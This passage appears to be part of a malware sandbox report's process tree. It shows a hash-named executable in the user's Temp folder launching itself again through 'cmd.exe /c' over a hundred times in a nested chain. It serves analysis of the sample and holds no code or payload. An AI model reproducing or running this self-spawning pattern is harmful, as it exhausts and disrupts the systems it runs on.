        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        61⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        62⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        63⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        64⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        65⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        66⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        67⤵
        
        PID:4184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        68⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        69⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        70⤵
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        71⤵
        
        PID:440
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        72⤵
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        73⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        74⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        75⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        76⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        77⤵
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        78⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        79⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        80⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        81⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        82⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        83⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        84⤵
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        85⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        86⤵
        
        PID:2872
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        87⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        88⤵
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        89⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        90⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        91⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        92⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        93⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        94⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        95⤵
        
        PID:1488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        96⤵
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        97⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        98⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        99⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        100⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        101⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        102⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        103⤵
        
        PID:744
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        104⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        105⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        106⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        107⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        108⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        109⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        110⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        111⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        112⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        113⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        114⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        115⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        116⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        117⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        118⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        119⤵
        
        PID:428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        120⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        121⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        122⤵
        
        PID:3816
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        123⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        124⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        125⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        126⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        127⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        128⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        129⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        130⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        131⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        132⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        133⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        134⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        135⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        136⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        137⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        138⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        139⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        140⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        141⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        142⤵
        
        PID:1428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        143⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        144⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        145⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        146⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        147⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        148⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        149⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        150⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        151⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        152⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        153⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        154⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        155⤵
        
        PID:592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        156⤵
        
        PID:1444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        157⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        158⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        159⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        160⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        161⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        162⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        163⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        164⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        165⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        166⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf
        167⤵
        
        PID:400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf"
        168⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe
        
